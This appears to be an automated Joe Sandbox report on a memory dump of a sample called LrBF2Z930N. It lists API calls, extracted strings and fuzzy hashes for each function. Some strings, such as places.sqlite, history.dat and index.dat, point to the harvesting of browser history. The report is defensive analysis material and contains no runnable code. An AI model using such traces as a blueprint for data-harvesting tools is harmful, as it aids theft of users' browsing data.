                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                      APIs
                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                      • free.MSVCRT ref: 00418803
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 1355100292-0
                                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                      APIs
                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                      • String ID: history.dat$places.sqlite
                                                                                      • API String ID: 2641622041-467022611
                                                                                      • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                      • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                      APIs
                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                      • String ID:
                                                                                      • API String ID: 839530781-0
                                                                                      • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                      • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID: *.*$index.dat
                                                                                      • API String ID: 1974802433-2863569691
                                                                                      • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                      • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 1156039329-0
                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                      • String ID:
                                                                                      • API String ID: 3397143404-0
                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                      • String ID:
                                                                                      • API String ID: 1125800050-0
                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleSleep
                                                                                      • String ID: }A
                                                                                      • API String ID: 252777609-2138825249
                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                      • free.MSVCRT ref: 00409A31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: freemallocmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3056473165-0
                                                                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                      APIs
                                                                                      Strings
                                                                                      • failed memory resize %u to %u bytes, xrefs: 00415358
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: realloc
                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                      • API String ID: 471065373-2134078882
                                                                                      • Opcode ID: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                                                                      • Instruction ID: fa0be88ae63bf8e7a0ec1cbb838f3bc130d20eb0a75070b99cf9e4f37552e13a
                                                                                      • Opcode Fuzzy Hash: 3434da1dbcbe40749f7bb19bb969ba9348cca2f332a45bcd3c57ad1b142d0162
                                                                                      • Instruction Fuzzy Hash: 6EF05CB3A01705E7D2109A55DC418CBF3DCDFC0755B06082FF998D3201E168E88083B6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: d
                                                                                      • API String ID: 0-2564639436
                                                                                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID: BINARY
                                                                                      • API String ID: 2221118986-907554435
                                                                                      • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                      • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp
                                                                                      • String ID: /stext
                                                                                      • API String ID: 2081463915-3817206916
                                                                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                      APIs
                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                      • String ID:
                                                                                      • API String ID: 2445788494-0
                                                                                      • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                      • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                      APIs
                                                                                      Strings
                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc
                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                      • API String ID: 2803490479-1168259600
                                                                                      • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                      • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                      • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                      • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcmpmemset
                                                                                      • String ID:
                                                                                      • API String ID: 1065087418-0
                                                                                      • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                      • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                      APIs
                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1381354015-0
                                                                                      • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                      • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                      • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
